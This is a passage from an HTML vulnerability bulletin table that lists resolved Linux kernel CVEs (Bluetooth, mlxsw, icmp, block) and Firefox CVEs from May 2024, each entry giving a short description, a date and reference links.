<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35850" target="_blank">CVE-2024-35850</a><br><a href="https://git.kernel.org/stable/c/67459f1a707aae6d590454de07956c2752e21ea4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7ddb9de6af0f1c71147785b12fd7c8ec3f06cc86" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bec4d4c6fa5c6526409f582e4f31144e20c86c21" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: fix NULL-deref on non-serdev suspend Qualcomm ROME controllers can be registered from the Bluetooth line discipline and in this case the HCI UART serdev pointer is NULL. Add the missing sanity check to prevent a NULL-pointer dereference when wakeup() is called for a non-serdev controller during suspend. Just return true for now to restore the original behaviour and address the crash with pre-6.2 kernels, which do not have commit e9b3e5b8c657 ("Bluetooth: hci_qca: only assign wakeup with serial port support") that causes the crash to happen already at setup() time.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35851" target="_blank">CVE-2024-35851</a><br><a href="https://git.kernel.org/stable/c/52f9041deaca3fc5c40ef3b9cb943993ec7d2489" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6b47cdeb786c38e4174319218db3fa6d7b4bba88" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/73e87c0a49fda31d7b589edccf4c72e924411371" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b64092d2f108f0cd1d7fd7e176f5fb2a67a2f189" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e60502b907be350c518819297b565007a94c706d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work The rehash delayed work is rescheduled with a delay if the number of credits at end of the work is not negative as supposedly it means that the migration ended. Otherwise, it is rescheduled immediately. After "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash" the above is no longer accurate as a non-negative number of credits is no longer indicative of the migration being done. It can also happen if the work encountered an error in which case the migration will resume the next time the work is scheduled. The significance of the above is that it is possible for the work to be pending and associated with hints that were allocated when the migration started. This leads to the hints being leaked [1] when the work is canceled while pending as part of ACL region dismantle. Fix by freeing the hints if hints are associated with a work that was canceled while pending. Blame the original commit since the reliance on not having a pending work associated with hints is fragile. [1] unreferenced object 0xffff88810e7c3000 (size 256): comm "kworker/0:16", pid 176, jiffies 4295460353 hex dump (first 32 bytes): 00 30 95 11 81 88 ff ff 61 00 00 00 00 00 00 80 .0......a....... 00 00 61 00 40 00 00 00 00 00 00 00 04 00 00 00 ..a.@........... backtrace (crc 2544ddb9): [&lt;00000000cf8cfab3&gt;] kmalloc_trace+0x23f/0x2a0 [&lt;000000004d9a1ad9&gt;] objagg_hints_get+0x42/0x390 [&lt;000000000b143cf3&gt;] mlxsw_sp_acl_erp_rehash_hints_get+0xca/0x400 [&lt;0000000059bdb60a&gt;] mlxsw_sp_acl_tcam_vregion_rehash_work+0x868/0x1160 [&lt;00000000e81fd734&gt;] process_one_work+0x59c/0xf20 [&lt;00000000ceee9e81&gt;] worker_thread+0x799/0x12c0 [&lt;00000000bda6fe39&gt;] kthread+0x246/0x300 [&lt;0000000070056d23&gt;] ret_from_fork+0x34/0x70 [&lt;00000000dea2b93e&gt;] ret_from_fork_asm+0x1a/0x30</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35852" target="_blank">CVE-2024-35852</a><br><a href="https://git.kernel.org/stable/c/51cefc9da400b953fee749c9e5d26cd4a2b5d758" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5bfe7bf9656ed2633718388f12b7c38b86414a04" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/63d814d93c5cce4c18284adc810028f28dca493f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/857ed800133ffcfcee28582090b63b0cbb8ba59d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d72dd6fcd7886d0523afbab8b4a4b22d17addd7d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fb4e2b70a7194b209fc7320bbf33b375f7114bd5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix memory leak during rehash The rehash delayed work migrates filters from one region to another. This is done by iterating over all chunks (all the filters with the same priority) in the region and in each chunk iterating over all the filters. If the migration fails, the code tries to migrate the filters back to the old region. However, the rollback itself can also fail in which case another migration will be erroneously performed. Besides the fact that this ping pong is not a very good idea, it also creates a problem. Each virtual chunk references two chunks: The currently used one ('vchunk-&gt;chunk') and a backup ('vchunk-&gt;chunk2'). During migration the first holds the chunk we want to migrate filters to and the second holds the chunk we are migrating filters from. The code currently assumes - but does not verify - that the backup chunk does not exist (NULL) if the currently used chunk does not reference the target region. This assumption breaks when we are trying to rollback a rollback, resulting in the backup chunk being overwritten and leaked [1]. Fix by not rolling back a failed rollback and add a warning to avoid future cases. [1] WARNING: CPU: 5 PID: 1063 at lib/parman.c:291 parman_destroy+0x17/0x20 Modules linked in: CPU: 5 PID: 1063 Comm: kworker/5:11 Tainted: G W 6.9.0-rc2-custom-00784-gc6a05c468a0b #14 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work RIP: 0010:parman_destroy+0x17/0x20 [...] Call Trace: &lt;TASK&gt; mlxsw_sp_acl_atcam_region_fini+0x19/0x60 mlxsw_sp_acl_tcam_region_destroy+0x49/0xf0 mlxsw_sp_acl_tcam_vregion_rehash_work+0x1f1/0x470 process_one_work+0x151/0x370 worker_thread+0x2cb/0x3e0 kthread+0xd0/0x100 ret_from_fork+0x34/0x50 ret_from_fork_asm+0x1a/0x30 &lt;/TASK&gt;</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35853" target="_blank">CVE-2024-35853</a><br><a href="https://git.kernel.org/stable/c/0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/413a01886c3958d4b8aac23a3bff3d430b92093e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/617e98ba4c50f4547c9eb0946b1cfc26937d70d1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8ca3f7a7b61393804c46f170743c3b839df13977" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b3fd51f684a0711504f82de510da109ae639722d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b822644fd90992ee362c5e0c8d2556efc8856c76" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e5c4eb742686d6952f854e76" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash The rehash delayed work migrates filters from one region to another according to the number of available credits. The migrated from region is destroyed at the end of the work if the number of credits is non-negative as the assumption is that this is indicative of migration being complete. This assumption is incorrect as a non-negative number of credits can also be the result of a failed migration. The destruction of a region that still has filters referencing it can result in a use-after-free [1]. Fix by not destroying the region if migration failed. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230 Read of size 8 at addr ffff8881735319e8 by task kworker/0:31/3858 CPU: 0 PID: 3858 Comm: kworker/0:31 Tainted: G W 6.9.0-rc2-custom-00782-gf2275c2157d8 #5 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work Call Trace: &lt;TASK&gt; dump_stack_lvl+0xc6/0x120 print_report+0xce/0x670 kasan_report+0xd7/0x110 mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230 mlxsw_sp_acl_ctcam_entry_del+0x2e/0x70 mlxsw_sp_acl_atcam_entry_del+0x81/0x210 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3cd/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 &lt;/TASK&gt; Allocated by task 174: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 __kmalloc+0x19c/0x360 mlxsw_sp_acl_tcam_region_create+0xdf/0x9c0 mlxsw_sp_acl_tcam_vregion_rehash_work+0x954/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 Freed by task 7: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 poison_slab_object+0x102/0x170 __kasan_slab_free+0x14/0x30 kfree+0xc1/0x290 mlxsw_sp_acl_tcam_region_destroy+0x272/0x310 mlxsw_sp_acl_tcam_vregion_rehash_work+0x731/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35854" target="_blank">CVE-2024-35854</a><br><a href="https://git.kernel.org/stable/c/311eeaa7b9e26aba5b3d57b09859f07d8e9fc049" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4c89642ca47fb620914780c7c51d8d1248201121" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/54225988889931467a9b55fdbef534079b665519" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/813e2ab753a8f8c243a39ede20c2e0adc15f3887" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a02687044e124f8ccb427cd3632124a4e1a7d7c1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a429a912d6c779807f4d72a6cc0a1efaaa3613e1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e118e7ea24d1392878ef85926627c6bc640c4388" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update The rule activity update delayed work periodically traverses the list of configured rules and queries their activity from the device. As part of this task it accesses the entry pointed by 'ventry-&gt;entry', but this entry can be changed concurrently by the rehash delayed work, leading to a use-after-free [1]. Fix by closing the race and perform the activity query under the 'vregion-&gt;lock' mutex. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140 Read of size 8 at addr ffff8881054ed808 by task kworker/0:18/181 CPU: 0 PID: 181 Comm: kworker/0:18 Not tainted 6.9.0-rc2-custom-00781-gd5ab772d32f7 #2 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_rule_activity_update_work Call Trace: &lt;TASK&gt; dump_stack_lvl+0xc6/0x120 print_report+0xce/0x670 kasan_report+0xd7/0x110 mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140 mlxsw_sp_acl_rule_activity_update_work+0x219/0x400 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 &lt;/TASK&gt; Allocated by task 1039: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 __kmalloc+0x19c/0x360 mlxsw_sp_acl_tcam_entry_create+0x7b/0x1f0 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x30d/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 Freed by task 1039: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 poison_slab_object+0x102/0x170 __kasan_slab_free+0x14/0x30 kfree+0xc1/0x290 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3d7/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35855" target="_blank">CVE-2024-35855</a><br><a href="https://git.kernel.org/stable/c/1b73f6e4ea770410a937a8db98f77e52594d23a0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b183b915beef818a25e3154d719ca015a1ae0770" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b996e8699da810e4c915841d6aaef761007f933a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c17976b42d546ee118ca300db559630ee96fb758" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e24d2487424779c02760ff50cd9021b8676e19ef" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/feabdac2057e863d0e140a2adf3d232eb4882db4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: Fix double free of skb in coredump hci_devcd_append() would free the skb on error so the caller don't have to free it again otherwise it would cause the double free of skb. Reported-by : Dan Carpenter &lt;dan.carpenter@linaro.org&gt;</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35856" target="_blank">CVE-2024-35856</a><br><a href="https://git.kernel.org/stable/c/18bdb386a1a30e7a3d7732a98e45e69cf6b5710d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/80dfef128cb9f1b1ef67c0fe8c8deb4ea7ad30c1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e20093c741d8da9f6390dd45d75b779861547035" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: icmp: prevent possible NULL dereferences from icmp_build_probe() First problem is a double call to __in_dev_get_rcu(), because the second one could return NULL. if (__in_dev_get_rcu(dev) &amp;&amp; __in_dev_get_rcu(dev)-&gt;ifa_list) Second problem is a read from dev-&gt;ip6_ptr with no NULL check: if (!list_empty(&amp;rcu_dereference(dev-&gt;ip6_ptr)-&gt;addr_list)) Use the correct RCU API to fix these. v2: add missing include &lt;net/addrconf.h&gt;</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35857" target="_blank">CVE-2024-35857</a><br><a href="https://git.kernel.org/stable/c/23b7ee4a8d559bf38eac7ce5bb2f6ebf76f9c401" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3e2979bf080c40da4f7c93aff8575ab8bc62b767" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/599c9ad5e1d43f5c12d869f5fd406ba5d8c55270" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c58e88d49097bd12dfcfef4f075b43f5d5830941" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d68dc711d84fdcf698e5d45308c3ddeede586350" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: bcmasp: fix memory leak when bringing down interface When bringing down the TX rings we flush the rings but forget to reclaimed the flushed packets. This leads to a memory leak since we do not free the dma mapped buffers. This also leads to tx control block corruption when bringing down the interface for power management.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35858" target="_blank">CVE-2024-35858</a><br><a href="https://git.kernel.org/stable/c/09040baf8779ad880e0e0d0ea10e57aa929ef3ab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2389ad1990163d29cba5480d693b4c2e31cc545c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9f898fc2c31fbf0ac5ecd289f528a716464cb005" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: block: fix module reference leakage from bdev_open_by_dev error path At the time bdev_may_open() is called, module reference is grabbed already, hence module reference should be released if bdev_may_open() failed. This problem is found by code review.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35859" target="_blank">CVE-2024-35859</a><br><a href="https://git.kernel.org/stable/c/0e9327c67410b129bf85e5c3a5aaea518328636f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9617cd6f24b294552a817f80f5225431ef67b540" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4367" target="_blank">CVE-2024-4367</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893645" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>Multiple WebRTC threads could have claimed a newly connected audio input leading to use-after-free. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4764" target="_blank">CVE-2024-4764</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1879093" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>Web application manifests were stored by using an insecure MD5 hash which allowed for a hash collision to overwrite another application's manifest. This could have been exploited to run arbitrary code in another application's context. *This issue only affects Firefox for Android. Other versions of Firefox are unaffected.* This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4765" target="_blank">CVE-2024-4765</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1871109" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>Different techniques existed to obscure the fullscreen notification in Firefox for Android. These could have lead to potential user confusion and spoofing attacks. *This bug only affects Firefox for Android. Other versions of Firefox are unaffected.* This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4766" target="_blank">CVE-2024-4766</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1871214" target="_blank">security@mozilla.org</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1871217" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>If the `browser.privatebrowsing.autostart` preference is enabled, IndexedDB files were not properly deleted when the window was closed. This preference is disabled by default in Firefox. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4767" target="_blank">CVE-2024-4767</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1878577" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>A bug in popup notifications' interaction with WebAuthn made it easier for an attacker to trick a user into granting permissions. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4768" target="_blank">CVE-2024-4768</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1886082" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>When importing resources using Web Workers, error messages would distinguish the difference between `application/javascript` responses and non-script responses. This could have been abused to learn information cross-origin. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4769" target="_blank">CVE-2024-4769</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1886108" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>When saving a page to PDF, certain font styles could have led to a potential use-after-free crash. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4770" target="_blank">CVE-2024-4770</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893270" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>A memory allocation check was missing which would lead to a use-after-free if the allocation failed. This could have triggered a crash or potentially be leveraged to achieve code execution. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4771" target="_blank">CVE-2024-4771</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893891" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>An HTTP digest authentication nonce value was generated using `rand()` which could lead to predictable values. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4772" target="_blank">CVE-2024-4772</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1870579" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>When a network error occurred during page load, the prior content could have remained in view with a blank URL bar. This could have been used to obfuscate a spoofed web site. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4773" target="_blank">CVE-2024-4773</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1875248" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>The `ShmemCharMapHashEntry()` code was susceptible to potentially undefined behavior by bypassing the move semantics for one of its data members. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4774" target="_blank">CVE-2024-4774</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1886598" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>An iterator stop condition was missing when handling WASM code in the built-in profiler, potentially leading to invalid memory access and undefined behavior. *Note:* This issue only affects the application when the profiler is running. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4775" target="_blank">CVE-2024-4775</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1887332" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>A file dialog shown while in full-screen mode could have resulted in the window remaining disabled. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
